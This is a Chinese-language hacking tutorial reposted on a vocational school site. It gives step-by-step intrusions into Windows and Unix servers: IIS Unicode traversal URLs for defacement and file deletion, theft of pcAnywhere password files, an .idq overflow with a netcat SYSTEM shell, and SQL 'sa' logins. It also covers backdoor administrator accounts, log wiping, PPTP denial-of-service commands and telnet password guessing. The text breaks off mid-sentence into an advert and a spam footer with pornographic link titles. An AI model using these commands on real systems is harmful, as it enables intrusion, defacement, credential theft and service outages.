當前位置:湖南陽光電子技術學校文章資訊技術園地電腦維修技術
招生辦公室電話:13308461099 13807313137 全國免費電話:13807313137

菜鳥入門速成教程-流行的漏洞入侵

減小字體 增大字體 作者:佚名  來源:本站整理  發布時間:2010-07-29 20:26:33

終于決定要寫下這份速成教材了,好讓一些正準備步入黑客殿堂的朋友和一些正在步入黑客殿堂的朋友可以很快的找到感覺.因為是速成所以里面的一些理論上的東東會被X掉,大家如果要學的話可以找書看看,以下都是攻擊的步驟(不準用在國內的機子上)
1 UNICODE漏洞
這是老漏洞了,但對于新手來說很好用,而且事實證明現在仍有很多的機子有這種漏洞,OK我們開始
先用掃描器掃到有UNICODE漏洞的機子,(注意漏洞的編碼方式有所不同有的是..%CI%IC.. 用的是..%C0%AF..當然還有其它的方式, 具體根據你的掃描器掃出的結果為標準
我們在流覽器(IE)的地址欄中輸入
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+dir
這時你可以看到它的系統目錄但我們要的是主頁面放置的目錄
在輸入
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:/inetpub/wwwroot
看到了吧,目錄中的INDEX.HTML INDEX.ASP DEFAULT.ASP DEFAULT.ASP等等就是它的主頁面,
我們來換它的頁面
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:/winnt/system32/cmd.exe+ccc.exe

http://ip/scripts/ccc.exe?/c+echo+Hacked+by+KAWEN+ >+c:/inetpub/wwwroot/default.asp
OK
成功了,此時它的主頁面被換成了HACKED BY KAWEN
大家可以看看
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:/winnt/system32/cmd.exe+ccc.exe 執行后是復制,如果換成這個呢
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+DEL+c:/winnt/system32/cmd.exe
沒錯就是刪除了
知道怎么做了吧
呵呵

2利用PCANWHERE攻擊網站
現在開始入正題了,剛才只是熱身
由于NT的機器一般使用PCAnyWhere進行遠程管理,因此如果能夠得到PCAnyWhere遠程連接的帳號和密碼,那么就能遠程連接到主機。 ( http://fxyong.3322.net/getpwd.zip )便可以取得帳號和密碼
Telnet IP 5631
我們可以看看PCANYWHERE開了沒
使用Unicode漏洞+ PCanyWhere密碼查看工具
首先我們要DOWN一個可以破 Pcanywhere的工具
http://www.symantec.com/
OK 我們現在要找到主機上的*.CIF文件
在IE中輸入 http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+dir c:/*.cif /s
一般Citempl.cif為系統默認的密碼文件,因此我們需要SA.CIF文件。 復制該文件到網站目錄下。
需要知道網站目錄,可以通過ida,idq漏洞進行得到,也可以去尋找網站中的一個圖片文件,比如Tscontent.gif文件,然后去查找該文件:使用命令 dir c:/ Tscontent.gif /s
比如網站目錄為c:/inetpub/wwwroot/ 一般都有是啦 呵呵
密碼文件所在目錄:c:/Program Files/pcANYWHERE/DATA
下面執行Copy命令:
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+copy c:/Program Files/pcANYWHERE/DATA/SA.CGI c:/inetpub/wwwroot/
顯示1 file(s) copied,就表示復制成功了。

使用IE下載該文件
使用 http://IP/sa.cif 就可以下載該文件了。

使用PCanyWhere密碼查看工具得到用戶名和密碼

3利用.idq漏洞  

為了方便大家可以看懂下面說的是什么可以先到這里來看看
http://snake12.top263.net/IISOverflow/IISOverflow.htm
一共有兩個版本.一個是GUI版本.一個是命令行版本.
這里我們來說CUI版本,反正都差不多了,關鍵是要多試
首先我們要找到有.IDQ漏洞的機子,可以用流光掃一下
運行軟件
在被攻擊IP地址后面寫上對方的IP.端口號一般不需要改動.
左面選擇操作系統類型.先選擇IIS5 English Win2k Sp0吧~
軟件的默認綁定CMD.EXE的端口是813.不改了.用默認吧~~~
點擊IDQ溢出~~OK~~出現發送Shellcode成功的提示了.
接著我們用NC,你可以到到盟下載 WWW.CNHONKER.COM
C:/>nc -vv XXX.XXX.XXX.XXX 813
XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [XXX.XXX.XXX.XXX] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:/WINNT/system32>

OK!!!上來了
你現在有SYSTEM權限,不錯吧,該做什么不用我教了吧,比如為自已留下個后門
net user hacker password /add '添加一給名為hacker,密碼為passwod的用戶!
net localgroup administrators hacker /add ' 把剛才創建的用戶加入 Admnistrators組
OK我們在來看看DOS版本
下載軟件后會有個運行文件,它太長了,將它必名為KAWEN
D:/>KAWEN
運行參數: 操作系統類型 目的地址 web端口 溢出端口
支持的操作系統 類型: ----
0 -- IIS5中文Win2k Sp0
1 -- IIS5中文Win2k Sp1
2 -- IIS5中文Win2k Sp2
3 -- IIS5 English Win2k Sp0
4 -- IIS5 English Win2k Sp1
5 -- --not support -- IIS5 English Win2k Sp2
6 -- IIS5 Japanese Win2k Sp0
7 -- IIS5 Japanese Win2k Sp1
8 -- --not support -- IIS5 Japanese Win2k Sp2

D:/>KAWEN 3 XXX.XXX.XXX.XXX80 456
連接目的機器 XXX.XXX.XXX.XXX:80 OK.
發送shellcode 到 XXX.XXX.XXX.XXX:80 OK
現在,你可以 連接 該主機的 端口 456了,good luck.!

開始吧
D:/>nc -vv XXX.XXX.XXX.XXX 456
mail.rycf.org [XXX.XXX.XXX.XXX] 456 (?): connection refused
sent 0, rcvd 0: NOTSOCK

沒成功.試試sp1.
D:/>KAWEN 4 XXX.XXX.XXX.XXX 80 888
連接目的機器 XXX.XXX.XXX.XXX:80 OK.
發送shellcode 到 XXX.XXX.XXX.XXX:80 OK
現在,你可以 連接 該主機的 端口 888了,good luck.!
D:/>nc -vv XXX.XXX.XXX.XXX 888
XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [XXX.XXX.XXX.XXX] 888 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:/WINNT/system32>
看看我們又成功了

4 SQL攻擊網站
這個也很方便,呵呵,上次在對美國大戰中也有不少兄弟是用這種方法的,來看看吧
我們需要小榕的流光作為武器,到WWW.NETEYES.COM去DOWN一個
運行流光然后按快捷鍵ctrl+r搜索!
選擇aql!輸入開始和結束的IP!掃描吧!到搜索結束!察看流光 下面的視圖!格式如下:
用戶名 密碼 地址
sa 211.21.220.28
sa 211.21.220.26
sa 211.21.220.197
其中《null》表示密碼為空!
雙擊其中一項(或在工具……>SQL登錄)!會彈出一個dos窗口!如果過一會該窗口消失!沒戲了!對方不支持遠程登錄!在換一個!如果過一會出現如下的字樣:
SQL Remote Cmd For Fluxay 2001 by Assassin 1995 - 2000. Thanks to Eyas!
Connect to 211.21.220.28 MSSQL Server Success, Type Command in Prompt.
SQLCmd>
那表示已經登錄上了對方的主機!然后
SQLCmd>net user ‘察看用戶!如果不能察看,說明sa權限不夠,那也沒戲,換其他的方法!或是走人!有時用net user察看成功!再試試
SQLCmd>net user administrator ’察看Admin的情況(可知是否在線)如果失敗,撤退吧,
沒戲,換方法! 沒有權限,但是如果可以的話
下一步:
SQLCmd>net user hacker password /add '添加一給名為hacker,密碼為passwod的用戶!
SQLCmd>net localgroup administrators hacker /add ' 把剛才創建的用戶加入 Admnistrators組

好了,告一段落,下面啟動DOS用剛創建的用戶進行ipc$
net use //*.*.*.*/ipc$ "password" /user:"hacker" '很熟悉吧!IPC$開始了!
執行成功的話!搞吧!刪除!上傳!下載!要什么!隨你!
例如copy c:/hacker/index.htm //IP/c$/inetpub/wwwroot/default.htm (IP為它的IP)
干什么,換他的主頁啊!呵呵!

據我的實踐!針對臺灣的主機!另一方法是用剛創建的用戶名和密碼用CuteFtp登錄!就象管理自己的站點一樣!任意刪除創建Html頁面!此方法對美國的主機沒有成功過!我都是IPC$搞定的!

以上的原理是用SQL開門!用IPC$進門做作administrator可以作的事!但對于SQL主機!Administrator一般沒有對數據庫刪除或創建的權限!此時可以down下他的sam文件解密(怎么DOWN?暈,看看我在上面UNICODE中寫的教材)!默認用戶名SQLAgentCmdExec,然后用天行的SQlBrowse登錄就可以對數據庫任意操作了!

5 利用輸入法漏洞
要說老美真不是東西,這么大個洞現在還尚存人間,也好,大家可以練練手
1、用端口掃瞄程序掃IP的3389端口,得到xx.xx.xx.xx。

  2、運行windows2000終端客戶程序,在服務器輸入框里填入:xx.xx.xx.xx ,連接。

  3、出現windows2000的登陸窗口,按下CTRL+SHIFT鍵,出現全拼輸入法。

  4、在輸入法狀態條上按mouse右鍵,選擇幫助,選擇輸入指南,選擇"選項"按右鍵。

  5、選擇"跳轉到URL",輸入:c:/winnt/system32/cmd.exe.

  6、選擇"保存到磁盤"。

  7、選擇目錄:c:/inetpub/scripts/

  8、打開IE,輸入:xx.xx.xx.xx/scripts/cmd.exe?/c+dir+c:/ (知道了吧)

  9、輸入:xx.xx.xx.xx/scripts/cmd.exe?/c+echo+BEIJING+>c:/inetpub/wwwroot/default.asp

還有一種方法
1.掃描 3389 port 終端服務默認;
2.用終端客戶端程序進行連接;
3.按ctrl+shift調出全拼輸入法(其他似乎不行),點鼠標右鍵(如果其幫助菜單發灰,就趕快趕下家吧,人家打補丁了),點幫助,點輸入法入門;
4.在"選項"菜單上點右鍵--->跳轉到URL",輸入:c:/winnt/system32/cmd.exe.(如果不能確定NT系統目錄,則輸入:c:/ 或d:/ ……進行查找確定);
5.選擇"保存到磁盤" 選擇目錄:c:/inetpub/scripts/,因實際上是對方服務器上文件自身的復制操作,所以這個過程很快就會完成;
6.打開IE,輸入: http://ip/scripts/cmd.exe?/c dir 怎么樣?有cmd.exe文件了吧?這我們就完成了第一步;
7. http://ip/scripts/cmd.exe?/c echo net user guest /active:yes>go.bat
8. http://ip/scripts/cmd.exe?/c echo net user guest elise>>go.bat
9. http://ip/scripts/cmd.exe?/c echo net localgroup administrators /add guest>>go.bat
10. http://ip/scripts/cmd.exe?/c type go.bat 看看我們的批文件內容是否如下:

net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
11.在"選項"菜單上點右鍵--->跳轉到URL",輸入:c:/inetpub/scripts/go.bat --->在磁盤當前位置執行;
12.呵呵,大功告成啦,這樣我們就激活了服務器的geust帳戶,密碼為:elise,超級用戶呢! (我喜歡guest而不是建立新帳戶,這樣似乎不易被發現些),
后一定別不記的X掉自已的腳印
del+C:/winnt/system32/logfiles/*.*
del+C:/winnt/ssytem32/config/*.evt
del+C:/winnt/system32/dtclog/*.*
del+C:/winnt/system32/*.log
del+C:/winnt/system32/*.txt
del+C:/winnt/*.txt
del+C:/winnt/*.log

6 教你DoS攻擊微軟的PPTP
呵呵,大家沒有看錯,的確是微軟的,我們先看看PPTP是個什么東東PPTP(Piont-to-point Tunneling Protocol 點對點傳輸協議)是一個用以建立VPN的網絡協議. 此協議需TCP(端口1723)和GRE以完成工作.
易收攻擊系統:
* Dell PowerEdge 2200 with Intel 10/100 adapter, 256 MB RAM, NT Server 4.0
* Dell Dimension XPS M200s with 3Com 905B adapter, 64 MB RAM, NT Server 4.0

安全的系統:
* HP Vectra XA with AMD PCNet integrated Ethernet, 128 MB RAM, NT Workstation 4.0
* Dell Latitude CPx with 3Com 3CCFEM656 PC Card adapter, 128 MB RAM, NT Workstation 4.0
* Generic dual PII (Asus motherboard) with 3Com 980x adapter, 256 MB RAM, NT Server 4.0
* Dell Dimension XPS T550 with 3Com 905C-TX adapter, 128 MB RAM, NT Workstation 4.0

如何實現:
~~~~~~~~~
*需要的工具*
1.UNIX box(例如linux,*bsd....)
2.netcat ( http://www.l0pht.com/~weld/netcat/ )
3.apsend ( http://www.elxsi.de/ )
4.ipsend ( http://coombs.anu.edu.au/~avalon/ )

OK,這就好說了,
我們來看它的三個BUG
1 TCP端口1723
此弱點只在prior至SP6的機器上有效。并不是所有的機器都存在這個漏洞;請在Unix 操作系統內鍵入以下:
$ nc 1723 < /dev/zero

如機器存在此漏洞, 目標主機將在幾秒種之內藍屏,并有如下錯誤:
STOP 0x0A (0x0, 0x2, 0x0, 0x0) IRQL_NOT_LESS_OR_EQUAL
再次提醒,此弱點只對部分機器有效

2 GRE
此弱點對所有Service pack有效
在目標機器上,打開任務管理器選擇“運行”。并打開 一個DOS窗口(開始-運行-CMD).在Unix類操作系統上:
$ apsend -d --protocol 47 -m 0 -q
在目標主機上你將看到任務管理器內內核記憶的數字將緩慢上升。 終,這些數字將停止增加;此時, CPU在一段時間內有可能被占用。現在你可以試著在命令提示符后鍵入一個命令例如DIR,這時你將看 到一個信息說提示操作系統已不可能完成要執行的命令

3弱點三:GRE
此弱點同樣對所有的Service pack有效。請在Unix操作系統上:
#!/bin/csh
foo:
ipsend -i -P gre > /dev/null
goto foo
目標主機很快會藍屏,大概需要50個數據。
明白了吧

7 UNIX攻擊
這里為了方便我們用finger 0@ip 來找UNIX的薄弱機器
C:/>finger 0@IP
xxx.xxx.xxx.xxx]

Login Name TTY Idle When Where

daemon ??? < . . . . >

bin ??? < . . . . >

sys ??? < . . . . >

jeffrey ??? pts/0 203.66.149.11

daniel ??? 437 114cm.kcable.

jamie ??? 0 203.66.162.68

postgres ??? pts/2 203.66.162.80

nsadmin ??? 768 203.66.19.50

ho ??? 390 61.169.209.106

house18 ??? pts/1 203.66.250.1

tong ??? pts/0 210.226. 42.69

jliu ??? pts/0 203.66.52.87

ptai ??? < . . . . >

看到了嗎,這里的LOGIN下的就是我們要的用戶名了
比如jeffrey,Daniel,Jamie,postgres
下面我們就來入侵
C:/>telnet xxx.xxx.xxx.xxx
一般的情況下我們都是猜密碼,怎么猜??就是上面LOGIN下的用戶名讓它又做用戶名和密碼呀,事實上總有一些人為了方便是這么設置的
login: ptai (***輸入用戶名***)

Password: **** (***輸入密碼***)

Login incorrect (***登陸失敗***)

login: jliu

Password:

Login incorrect

$ login: tong

Password:

Last login: Mon Jul 2 13:21:55 from 210.226. 42.69 (***這個用戶上次登陸時的IP***)

Sun Microsystems Inc. SunOS 5.6 Generic August 1997

You have mail. (***HOHO~登陸成功啦***)
看看這不就進來了
$ uname –a (***查看系統版本和補丁信息***)
$ set (***查看一些系?   湖南省陽光電子技術學校常年開設:手機維修培訓、家電維修培訓、電工培訓、電腦維修培訓、焊工培訓--面向全國火爆招生!網址:http://www.hnygpx.com 報名電話:13807313137)。安置就業。考試合格頒發全國通用權威證書。采用我校多年來獨創的“模塊教學法”,理論與實踐相結合、原理+圖紙+機器三位一體的教學模式,半天理論,半天實踐,通俗易懂,確保無任何基礎者也能全面掌握維修技能、成為同行業中的佼佼者。工作(一期不會,免費學會為止)。

Tags:漏洞 入門 菜鳥 教程

作者:佚名
[]
電工培訓學校 電動車維修學校 摩托車維修學校 摩托車維修培訓 手機維修培訓 家電維修培訓 電腦維修培訓 電動工具維修培訓 液晶電視維修培訓 安防監控培訓 空調維修培訓 網絡營銷培訓 網站設計培訓 淘寶網店培訓 電器維修培訓 家電維修學校 電工培訓 焊工培訓 電工學校 電工培訓學校 電動車維修學校 摩托車維修學校 摩托車維修培訓 手機維修培訓 家電維修培訓 電腦維修培訓 電動工具維修培訓 液晶電視維修培訓 安防監控培訓 空調維修培訓 網絡營銷培訓 網站設計培訓 淘寶網店培訓 電器維修培訓 家電維修學校 電工培訓 焊工培訓 電工學校 電工培訓學校 電動車維修學校 摩托車維修學校 摩托車維修培訓 手機維修培訓 家電維修培訓 電腦維修培訓 電動工具維修培訓 液晶電視維修培訓 安防監控培訓 空調維修培訓 網絡營銷培訓 網站設計培訓 淘寶網店培訓 電器維修培訓 家電維修學校 電工培訓 焊工培訓 電工學校 電工培訓學校 電動車維修學校 摩托車維修學校 摩托車維修培訓 手機維修培訓 家電維修培訓 電腦維修培訓 電動工具維修培訓 液晶電視維修培訓 安防監控培訓 空調維修培訓 網絡營銷培訓 網站設計培訓 淘寶網店培訓 電器維修培訓 家電維修學校 電工培訓 焊工培訓 電工學校
中山市,固原市,銀川市,玉樹,海東,隴南市,酒泉市,張掖市,天水市,金昌市,蘭州市,榆林市,延安市,渭南市,銅川市,阿里,山南,拉薩市,怒江,文山州,楚雄州,普洱市,昭通市,玉溪市,昆明市,畢節,銅仁,遵義市,貴陽市,甘孜州,資陽市,達州市,宜賓市,南充市,遂寧市,綿陽市,瀘州市,自貢市,三亞市,崇左市,河池市,玉林市,欽州市,梧州市,柳州市,梅州市,肇慶市,湛江市,佛山市,珠海市,韶關市,湘西州,懷化市,郴州市,張家界市,邵陽市,株洲市,仙桃市,隨州市,荊州市,荊門市,襄樊市,黃石市,駐馬店市,信陽市,南陽市,漯河市,中衛市,石嘴山市,海西,海南藏州,黃南州,海北,甘南,慶陽市,平涼市,武威市,白銀市,嘉峪關市,安康市,漢中市,咸陽市,寶雞市,林芝,日喀則,昌都,迪慶,德宏,大理,西雙版納,紅河州,臨滄市,麗江市,保山市,曲靖市,黔東州,黔西州,安順市,六盤水市,涼山州,阿壩州,雅安市,廣安市,眉山市,內江市,廣元市,德陽市,攀枝花市,成都市,海口市,來賓市,百色市,貴港市,北海市,桂林市,南寧市,云浮市,揭陽市,潮州市,清遠市,陽江市,汕尾市,惠州市,茂名市,江門市,汕頭市,深圳市,廣州市,婁底市,永州市,益陽市,岳陽市,湘潭市,長沙市,恩施州,黃岡市,孝感市,鄂州市,十堰市,武漢市,周口市,商丘市,三門峽市,許昌市,焦作市,安陽市,鶴壁市,平頂山市,開封市,鄭州市,聊城市,濱州市,德州市,萊蕪市,日照市,泰安市,煙臺市,濰坊市,東營市,淄博市,上饒市,濟南市,撫州市,宜春市,贛州市,新余市,九江市,景德鎮市,寧德市,南平市,泉州市,莆田市,廈門市,宣城市,亳州市,六安市,宿州市,黃山市,滁州市,安慶市,淮北市,馬鞍山市,蚌埠市,蕪湖市,合肥市,麗水市,舟山市,衢州市,金華市,湖州市,嘉興市,寧波市,宿遷市,鎮江市,鹽城市,連云港市,蘇州市,徐州市,南京市,綏化市,牡丹江市,佳木斯市,大慶市,鶴崗市,哈爾濱市,白城市,白山市,遼源市,吉林市,葫蘆島市,鐵嶺市,盤錦市,阜新市,錦州市,本溪市,鞍山市,沈陽市,錫林郭勒盟,通遼市,烏海市,呂梁市,忻州市,晉中市,晉城市,陽泉市,太原市,廊坊市,承德市,保定市,邯鄲市,唐山市,寧夏,甘肅省,西藏,貴州省,重慶市,廣西,湖南省,河南省,江西省,安徽省,江蘇省,黑龍江省,遼寧省,山西省,天津市,四平市,內蒙古,吳忠市,果洛,西寧市,定西市,商洛市,西安市,那曲,黔南州,巴中市,樂山市,賀州市,防城港市,東莞市,河源市,常德市,衡陽市,咸寧市,宜昌市,濮陽市,新鄉市,洛陽市,菏澤市,臨沂市,威海市,濟寧市,棗莊市,青島市,吉安市,鷹潭市,萍鄉市,南昌市,龍巖市,漳州市,三明市,福州市,池州市,巢湖市,阜陽市,銅陵市,淮南市,臺州市,紹興市,溫州市,杭州市,泰州市,揚州市,淮安市,南通市,常州市,無錫市,大興安嶺,黑河市,七臺河市,伊春市,雙鴨山市,雞西市,齊齊哈爾市,延邊,松原市,通化市,長春市,朝陽市,遼陽市,營口市,丹東市,撫順市,大連市,阿拉善盟,興安盟,烏蘭察布市,巴彥淖爾市,呼倫貝爾市,鄂爾多斯市,赤峰市,頭市,呼和浩特市,臨汾市,運城市,朔州市,長治市,大同市,衡水市,滄州市,張家口市,邢臺市,秦皇島市,石家莊市,青海省,陜西省,云南省,四川省,海南省,廣東省,湖北省,山東省,福建省,浙江省,上海市,吉林省,河北省,北京市 主站蜘蛛池模板: 深夜释放自己在线观看 | 18禁三级黄 | 国产精品av免费观看 | 久久久久国产一级毛片高清片 | 99影视久久电影网久久看影院 | 亚洲 欧美 日韩 国产 视频 | 97成人免费视频 | 另类欧美尿交 | 日本老师xxxxx18 | 亚洲精品国偷拍电影自产在线 | 武侠古典久久亚洲精品 | 亚洲精品无码午夜福利在线观看 | 国产野外无码理论片在线观看 | 国精产品一区一区三区有 | 草神被爆漫画羞羞漫画 | 爱豆剧果冻传媒在线播放 | 我的年轻漂亮继坶三级 | 动漫美女脱小内内露尿口 | 超碰国产人人做人人爽 | 性欧美videos俄罗斯 | 免费看a毛片 | 日本国产黄色片 | 暖暖 免费 日本 高清 在线1 | 野花韩国高清完整版在线观看5 | 亚洲国产精品VA在线看黑人 | 亚洲国产在线2020最新 | 日本十八禁无遮拦啪啪漫画 | 亚洲男人的天堂久久精品麻豆 | 影音先锋影院中文无码 | 无码骚夜夜精品 | 国产精品免费视频能看 | 999久久久无码国产精蜜柚 | 午夜福利小视频400 午夜福利网国产A | av天堂网2017avtt | 国产 亚洲 中文字幕 在线 | 伊人久久大香 | FREE17一18外女破 | 久久久久国产 | 91精品免费久久久久久久久 | 国产野外无码理论片在线观看 | 秋霞在线观看视频一区二区三区 |